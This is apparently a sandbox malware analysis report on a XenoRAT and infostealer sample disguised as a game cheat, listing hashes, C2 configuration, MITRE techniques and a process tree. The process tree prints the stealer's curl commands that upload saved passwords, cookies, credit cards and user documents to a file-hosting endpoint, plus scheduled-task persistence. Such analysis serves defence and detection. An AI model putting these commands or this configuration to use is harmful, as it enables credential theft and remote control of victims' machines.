xenorat | 5e5eaafb3547a91972fd42a2fb4b74f533ceedcbfcc7efa437e9f2027f4a7152

Analysis

max time kernel
148s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
04-04-2024 15:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MayhemAim/MayAimV1.3.exe
Size

52.8MB
MD5

4b734573819d52ac89d637ff0f802971
SHA1

37a7c0fc457feca1e9d6faa2c216115a7894ecd2
SHA256

1518c30f9c0b3cb8374bc49e9d525e75f364bfb6b19311b9d1dfdb45f17b6308
SHA512

57e48394301a486d8aa524a679c38626e2824e127c796788fbbdccf5b5226f303fcfe910bdf1c5fe08e1ce24b3a8696772945b885642525b2a2d804c7a692016
SSDEEP

1572864:4BKda+yVUIW9s+3RLMR28kh1y3RFLVqgFsl2fok60:4vRkB8kAxqkl

Score

10^/10

xenorat persistence pyinstaller rat spyware stealer trojan upx

Malware Config

Extracted

Family

xenorat

6.tcp.ngrok.io

Mutex

fdsfdsfsdfsdfnd8912d

Attributes

delay
1000
install_path
appdata
port
17147
startup_name
Intel Processor ©

Signatures

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	svchost.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EPICGA~1.EXE	EPICGA~1.EXE

Executes dropped EXE 13 IoCs

pid	Process
3160	mayaim.EXE
4952	Cheat.exe
1160	Cheat.exe
3484	DMMEIF~1.EXE
1348	System32.exe
3672	System32.exe
4192	EPICGA~1.EXE
5264	EPICGA~1.EXE
1372	WINDOW~1.EXE
2360	System32.exe
5480	System32.exe
5608	svchost.exe
5716	svchost.exe

Loads dropped DLL 64 IoCs

pid	Process
1160	Cheat.exe
1160	Cheat.exe
1160	Cheat.exe
1160	Cheat.exe
1160	Cheat.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe
5264	EPICGA~1.EXE
5264	EPICGA~1.EXE
5264	EPICGA~1.EXE
5264	EPICGA~1.EXE
5264	EPICGA~1.EXE
5264	EPICGA~1.EXE
5264	EPICGA~1.EXE
5264	EPICGA~1.EXE
5264	EPICGA~1.EXE
5264	EPICGA~1.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3672-2001-0x0000000075190000-0x000000007569B000-memory.dmp	upx
behavioral1/memory/3672-2003-0x0000000075130000-0x000000007513D000-memory.dmp	upx
behavioral1/memory/3672-2002-0x0000000075140000-0x000000007515F000-memory.dmp	upx
behavioral1/memory/3672-2004-0x0000000075110000-0x0000000075128000-memory.dmp	upx
behavioral1/memory/3672-2005-0x00000000750E0000-0x0000000075107000-memory.dmp	upx
behavioral1/memory/3672-2006-0x00000000750C0000-0x00000000750D6000-memory.dmp	upx
behavioral1/memory/3672-2007-0x0000000075070000-0x000000007507C000-memory.dmp	upx
behavioral1/memory/3672-2008-0x0000000075040000-0x000000007506F000-memory.dmp	upx
behavioral1/memory/3672-2009-0x0000000075030000-0x000000007503C000-memory.dmp	upx
behavioral1/memory/3672-2010-0x0000000075000000-0x0000000075027000-memory.dmp	upx
behavioral1/memory/3672-2011-0x0000000075190000-0x000000007569B000-memory.dmp	upx
behavioral1/memory/3672-2012-0x0000000075140000-0x000000007515F000-memory.dmp	upx
behavioral1/memory/3672-2014-0x0000000074A90000-0x0000000074AB4000-memory.dmp	upx
behavioral1/memory/3672-2013-0x0000000074F60000-0x0000000075000000-memory.dmp	upx
behavioral1/memory/3672-2016-0x0000000074980000-0x0000000074A14000-memory.dmp	upx
behavioral1/memory/3672-2015-0x0000000074A20000-0x0000000074A48000-memory.dmp	upx
behavioral1/memory/3672-2017-0x0000000074720000-0x000000007497A000-memory.dmp	upx
behavioral1/memory/3672-2019-0x0000000074700000-0x0000000074712000-memory.dmp	upx
behavioral1/memory/3672-2022-0x00000000746F0000-0x00000000746FF000-memory.dmp	upx
behavioral1/memory/3672-2023-0x0000000074530000-0x0000000074667000-memory.dmp	upx
behavioral1/memory/3672-2024-0x0000000074670000-0x000000007468B000-memory.dmp	upx
behavioral1/memory/3672-2025-0x00000000750C0000-0x00000000750D6000-memory.dmp	upx
behavioral1/memory/3672-2026-0x0000000074510000-0x0000000074526000-memory.dmp	upx
behavioral1/memory/3672-2027-0x0000000074410000-0x0000000074432000-memory.dmp	upx
behavioral1/memory/3672-2028-0x0000000074450000-0x0000000074460000-memory.dmp	upx
behavioral1/memory/3672-2029-0x00000000742F0000-0x0000000074409000-memory.dmp	upx
behavioral1/memory/3672-2030-0x00000000742B0000-0x00000000742E1000-memory.dmp	upx
behavioral1/memory/3672-2031-0x0000000074260000-0x000000007426A000-memory.dmp	upx
behavioral1/memory/3672-2032-0x0000000074240000-0x000000007424A000-memory.dmp	upx
behavioral1/memory/3672-2033-0x00000000741E0000-0x00000000741EA000-memory.dmp	upx
behavioral1/memory/3672-2034-0x00000000741C0000-0x00000000741CA000-memory.dmp	upx
behavioral1/memory/3672-2035-0x00000000741B0000-0x00000000741C0000-memory.dmp	upx
behavioral1/memory/3672-2036-0x00000000741A0000-0x00000000741AA000-memory.dmp	upx
behavioral1/memory/3672-2039-0x0000000074720000-0x000000007497A000-memory.dmp	upx
behavioral1/memory/3672-2037-0x0000000074230000-0x000000007423C000-memory.dmp	upx
behavioral1/memory/3672-2041-0x0000000074220000-0x000000007422D000-memory.dmp	upx
behavioral1/memory/3672-2042-0x0000000073F70000-0x000000007419C000-memory.dmp	upx
behavioral1/memory/3672-2043-0x0000000073F30000-0x0000000073F55000-memory.dmp	upx
behavioral1/memory/3672-2044-0x0000000074A20000-0x0000000074A48000-memory.dmp	upx
behavioral1/memory/3672-2045-0x0000000074980000-0x0000000074A14000-memory.dmp	upx
behavioral1/memory/3672-2046-0x0000000075190000-0x000000007569B000-memory.dmp	upx
behavioral1/memory/3672-2047-0x0000000075140000-0x000000007515F000-memory.dmp	upx
behavioral1/memory/3672-2048-0x0000000075130000-0x000000007513D000-memory.dmp	upx
behavioral1/memory/3672-2058-0x0000000074A20000-0x0000000074A48000-memory.dmp	upx
behavioral1/memory/3672-2057-0x0000000074A90000-0x0000000074AB4000-memory.dmp	upx
behavioral1/memory/3672-2056-0x0000000074F60000-0x0000000075000000-memory.dmp	upx
behavioral1/memory/3672-2055-0x0000000075000000-0x0000000075027000-memory.dmp	upx
behavioral1/memory/3672-2060-0x0000000074720000-0x000000007497A000-memory.dmp	upx
behavioral1/memory/3672-2059-0x0000000074980000-0x0000000074A14000-memory.dmp	upx
behavioral1/memory/3672-2054-0x0000000075030000-0x000000007503C000-memory.dmp	upx
behavioral1/memory/3672-2053-0x0000000075040000-0x000000007506F000-memory.dmp	upx
behavioral1/memory/3672-2062-0x00000000746F0000-0x00000000746FF000-memory.dmp	upx
behavioral1/memory/3672-2061-0x0000000074700000-0x0000000074712000-memory.dmp	upx
behavioral1/memory/3672-2063-0x0000000074670000-0x000000007468B000-memory.dmp	upx
behavioral1/memory/3672-2064-0x0000000074530000-0x0000000074667000-memory.dmp	upx
behavioral1/memory/3672-2065-0x0000000074510000-0x0000000074526000-memory.dmp	upx
behavioral1/memory/3672-2066-0x0000000074450000-0x0000000074460000-memory.dmp	upx
behavioral1/memory/3672-2070-0x0000000073F70000-0x000000007419C000-memory.dmp	upx
behavioral1/memory/3672-2069-0x00000000742B0000-0x00000000742E1000-memory.dmp	upx
behavioral1/memory/3672-2071-0x0000000073F30000-0x0000000073F55000-memory.dmp	upx
behavioral1/memory/3672-2068-0x00000000742F0000-0x0000000074409000-memory.dmp	upx
behavioral1/memory/3672-2067-0x0000000074410000-0x0000000074432000-memory.dmp	upx
behavioral1/memory/3672-2052-0x0000000075070000-0x000000007507C000-memory.dmp	upx
behavioral1/memory/3672-2051-0x00000000750C0000-0x00000000750D6000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	WINDOW~1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	MayAimV1.3.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	mayaim.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	DMMEIF~1.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 27 IoCs

Web Service

T1102

flow	ioc
62	discord.com
89	discord.com
90	discord.com
96	discord.com
103	discord.com
65	discord.com
87	discord.com
88	discord.com
99	discord.com
60	discord.com
100	discord.com
101	discord.com
102	discord.com
58	discord.com
66	discord.com
85	discord.com
91	discord.com
70	discord.com
72	discord.com
86	discord.com
104	discord.com
92	discord.com
64	discord.com
98	discord.com
71	discord.com
97	discord.com
105	6.tcp.ngrok.io

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
40	api.ipify.org
47	api.ipify.org
39	api.ipify.org

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0005000000022cd2-11.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
5804	schtasks.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3672	System32.exe
3672	System32.exe
3672	System32.exe
3672	System32.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeDebugPrivilege	3672	System32.exe
Token: SeIncreaseQuotaPrivilege	1784	WMIC.exe
Token: SeSecurityPrivilege	1784	WMIC.exe
Token: SeTakeOwnershipPrivilege	1784	WMIC.exe
Token: SeLoadDriverPrivilege	1784	WMIC.exe
Token: SeSystemProfilePrivilege	1784	WMIC.exe
Token: SeSystemtimePrivilege	1784	WMIC.exe
Token: SeProfSingleProcessPrivilege	1784	WMIC.exe
Token: SeIncBasePriorityPrivilege	1784	WMIC.exe
Token: SeCreatePagefilePrivilege	1784	WMIC.exe
Token: SeBackupPrivilege	1784	WMIC.exe
Token: SeRestorePrivilege	1784	WMIC.exe
Token: SeShutdownPrivilege	1784	WMIC.exe
Token: SeDebugPrivilege	1784	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1784	WMIC.exe
Token: SeRemoteShutdownPrivilege	1784	WMIC.exe
Token: SeUndockPrivilege	1784	WMIC.exe
Token: SeManageVolumePrivilege	1784	WMIC.exe
Token: 33	1784	WMIC.exe
Token: 34	1784	WMIC.exe
Token: 35	1784	WMIC.exe
Token: 36	1784	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1784	WMIC.exe
Token: SeSecurityPrivilege	1784	WMIC.exe
Token: SeTakeOwnershipPrivilege	1784	WMIC.exe
Token: SeLoadDriverPrivilege	1784	WMIC.exe
Token: SeSystemProfilePrivilege	1784	WMIC.exe
Token: SeSystemtimePrivilege	1784	WMIC.exe
Token: SeProfSingleProcessPrivilege	1784	WMIC.exe
Token: SeIncBasePriorityPrivilege	1784	WMIC.exe
Token: SeCreatePagefilePrivilege	1784	WMIC.exe
Token: SeBackupPrivilege	1784	WMIC.exe
Token: SeRestorePrivilege	1784	WMIC.exe
Token: SeShutdownPrivilege	1784	WMIC.exe
Token: SeDebugPrivilege	1784	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1784	WMIC.exe
Token: SeRemoteShutdownPrivilege	1784	WMIC.exe
Token: SeUndockPrivilege	1784	WMIC.exe
Token: SeManageVolumePrivilege	1784	WMIC.exe
Token: 33	1784	WMIC.exe
Token: 34	1784	WMIC.exe
Token: 35	1784	WMIC.exe
Token: 36	1784	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2796 wrote to memory of 3160	2796	MayAimV1.3.exe	88
PID 2796 wrote to memory of 3160	2796	MayAimV1.3.exe	88
PID 3160 wrote to memory of 4952	3160	mayaim.EXE	89
PID 3160 wrote to memory of 4952	3160	mayaim.EXE	89
PID 3160 wrote to memory of 4952	3160	mayaim.EXE	89
PID 4952 wrote to memory of 1160	4952	Cheat.exe	91
PID 4952 wrote to memory of 1160	4952	Cheat.exe	91
PID 4952 wrote to memory of 1160	4952	Cheat.exe	91
PID 3160 wrote to memory of 3484	3160	mayaim.EXE	101
PID 3160 wrote to memory of 3484	3160	mayaim.EXE	101
PID 3484 wrote to memory of 1348	3484	DMMEIF~1.EXE	102
PID 3484 wrote to memory of 1348	3484	DMMEIF~1.EXE	102
PID 3484 wrote to memory of 1348	3484	DMMEIF~1.EXE	102
PID 1348 wrote to memory of 3672	1348	System32.exe	103
PID 1348 wrote to memory of 3672	1348	System32.exe	103
PID 1348 wrote to memory of 3672	1348	System32.exe	103
PID 3672 wrote to memory of 3516	3672	System32.exe	104
PID 3672 wrote to memory of 3516	3672	System32.exe	104
PID 3672 wrote to memory of 3516	3672	System32.exe	104
PID 3672 wrote to memory of 4300	3672	System32.exe	106
PID 3672 wrote to memory of 4300	3672	System32.exe	106
PID 3672 wrote to memory of 4300	3672	System32.exe	106
PID 4300 wrote to memory of 1784	4300	cmd.exe	108
PID 4300 wrote to memory of 1784	4300	cmd.exe	108
PID 4300 wrote to memory of 1784	4300	cmd.exe	108
PID 3484 wrote to memory of 4192	3484	DMMEIF~1.EXE	109
PID 3484 wrote to memory of 4192	3484	DMMEIF~1.EXE	109
PID 3484 wrote to memory of 4192	3484	DMMEIF~1.EXE	109
PID 4192 wrote to memory of 5264	4192	EPICGA~1.EXE	110
PID 4192 wrote to memory of 5264	4192	EPICGA~1.EXE	110
PID 4192 wrote to memory of 5264	4192	EPICGA~1.EXE	110
PID 5264 wrote to memory of 5288	5264	EPICGA~1.EXE	111
PID 5264 wrote to memory of 5288	5264	EPICGA~1.EXE	111
PID 5264 wrote to memory of 5288	5264	EPICGA~1.EXE	111
PID 5264 wrote to memory of 1972	5264	EPICGA~1.EXE	113
PID 5264 wrote to memory of 1972	5264	EPICGA~1.EXE	113
PID 5264 wrote to memory of 1972	5264	EPICGA~1.EXE	113
PID 1972 wrote to memory of 3756	1972	cmd.exe	115
PID 1972 wrote to memory of 3756	1972	cmd.exe	115
PID 1972 wrote to memory of 3756	1972	cmd.exe	115
PID 5264 wrote to memory of 4748	5264	EPICGA~1.EXE	116
PID 5264 wrote to memory of 4748	5264	EPICGA~1.EXE	116
PID 5264 wrote to memory of 4748	5264	EPICGA~1.EXE	116
PID 4748 wrote to memory of 388	4748	cmd.exe	118
PID 4748 wrote to memory of 388	4748	cmd.exe	118
PID 4748 wrote to memory of 388	4748	cmd.exe	118
PID 5264 wrote to memory of 1872	5264	EPICGA~1.EXE	119
PID 5264 wrote to memory of 1872	5264	EPICGA~1.EXE	119
PID 5264 wrote to memory of 1872	5264	EPICGA~1.EXE	119
PID 1872 wrote to memory of 4256	1872	cmd.exe	121
PID 1872 wrote to memory of 4256	1872	cmd.exe	121
PID 1872 wrote to memory of 4256	1872	cmd.exe	121
PID 5264 wrote to memory of 4788	5264	EPICGA~1.EXE	122
PID 5264 wrote to memory of 4788	5264	EPICGA~1.EXE	122
PID 5264 wrote to memory of 4788	5264	EPICGA~1.EXE	122
PID 4788 wrote to memory of 2520	4788	cmd.exe	124
PID 4788 wrote to memory of 2520	4788	cmd.exe	124
PID 4788 wrote to memory of 2520	4788	cmd.exe	124
PID 5264 wrote to memory of 3696	5264	EPICGA~1.EXE	125
PID 5264 wrote to memory of 3696	5264	EPICGA~1.EXE	125
PID 5264 wrote to memory of 3696	5264	EPICGA~1.EXE	125
PID 3696 wrote to memory of 2852	3696	cmd.exe	127
PID 3696 wrote to memory of 2852	3696	cmd.exe	127
PID 3696 wrote to memory of 2852	3696	cmd.exe	127

C:\Users\Admin\AppData\Local\Temp\MayhemAim\MayAimV1.3.exe
"C:\Users\Admin\AppData\Local\Temp\MayhemAim\MayAimV1.3.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2796
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mayaim.EXE
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mayaim.EXE
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:3160
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Cheat.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Cheat.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4952
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Cheat.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Cheat.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1160
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\DMMEIF~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\DMMEIF~1.EXE
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:3484
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1348
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3672
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:3516
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4300
        
        C:\Windows\SysWOW64\wbem\WMIC.exe
        
        C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1784
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EPICGA~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EPICGA~1.EXE
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4192
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EPICGA~1.EXE
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\EPICGA~1.EXE
        5⤵
        Drops startup file
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:5264
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        6⤵
        
        PID:5288
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store8.gofile.io/uploadFile"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1972
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:3756
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store8.gofile.io/uploadFile"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4748
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:388
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store8.gofile.io/uploadFile"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1872
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:4256
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store8.gofile.io/uploadFile"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4788
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:2520
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store8.gofile.io/uploadFile"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3696
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:2852
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store8.gofile.io/uploadFile"
        6⤵
        
        PID:448
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:3140
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/BackupRevoke.vst" https://store8.gofile.io/uploadFile"
        6⤵
        
        PID:3384
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin/Documents/BackupRevoke.vst" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:2284
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/CompressBackup.rtf" https://store8.gofile.io/uploadFile"
        6⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin/Documents/CompressBackup.rtf" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:4084
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ResetBackup.mpp" https://store8.gofile.io/uploadFile"
        6⤵
        
        PID:5052
        
        C:\Windows\SysWOW64\curl.exe
        
        curl -F "file=@C:\Users\Admin/Documents/ResetBackup.mpp" https://store8.gofile.io/uploadFile
        7⤵
        
        PID:2104
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WINDOW~1.EXE
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WINDOW~1.EXE
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1372
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\System32.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\System32.exe
    3⤵
    - Executes dropped EXE
    PID:2360
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\System32.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\System32.exe
      4⤵
      Executes dropped EXE
      PID:5480
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\svchost.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\svchost.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:5608
  - - C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
      "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"
      4⤵
      Executes dropped EXE
      PID:5716
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /Create /TN "Intel Processor ©" /XML "C:\Users\Admin\AppData\Local\Temp\tmpEAF7.tmp" /F
        5⤵
        Creates scheduled task(s)
        
        PID:5804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\mayaim.EXE

Filesize
43.4MB

MD5
7b070324b49fe5e90d31fea4caa07d33

SHA1
8a26d8bd1a3c32d10bd3ee236335048710868ac6

SHA256
44055762d74ecbac2e5a6c5348c05d803a14428b9fad486bfb2b600b03e462fa

SHA512
a9769e9b38e9f88d77ca545ce9660410d5ccaa8a62d32724438092dad2c4691f8ab454b6eaec6cb90981f82eddf23b3e4bc7a1cc7b3b4935d699f13e119b7bb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Cheat.exe

Filesize
8.0MB

MD5
1865683e49a401e02e57058ae9761c92

SHA1
4fe814655b0b2cbfb4fe56daf7fb3e059ba75560

SHA256
008dc90ac87b8733886c2a312a3521b9e863005fd24db53cce79aff021050619

SHA512
b5016041f8285990ec90c3efd5eaba01c90feb67ebc8c5759a5a336dc0896fefa37c08ea6a6412e8e6458dec6e152669ce57462bba6006e0818ac77aa505a336

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41922\setuptools-65.5.0.dist-info\INSTALLER

Filesize
4B

MD5
365c9bfeb7d89244f2ce01c1de44cb85

SHA1
d7a03141d5d6b1e88b6b59ef08b6681df212c599

SHA256
ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508

SHA512
d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49522\VCRUNTIME140.dll

Filesize
78KB

MD5
1e6e97d60d411a2dee8964d3d05adb15

SHA1
0a2fe6ec6b6675c44998c282dbb1cd8787612faf

SHA256
8598940e498271b542f2c04998626aa680f2172d0ff4f8dbd4ffec1a196540f9

SHA512
3f7d79079c57786051a2f7facfb1046188049e831f12b549609a8f152664678ee35ad54d1fff4447428b6f76bea1c7ca88fa96aab395a560c6ec598344fcc7fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49522\_bz2.pyd

Filesize
77KB

MD5
f73ea2b834471fb01d491a65caa1eea3

SHA1
00e888645e0a1638c639a2c21df04a3baa4c640a

SHA256
8633e8ad7172b095ed7ba40fa1039a64b04b20e6f42ac428e103d0c793831bda

SHA512
b8329b33d78458c2ac7979a5c5a19bd37ea9a473682d23faf54e77cfc5edadc0426490add9864e99a719ac5b4a57c5326ed82496adf80afd1876577caa608418

Download Submit
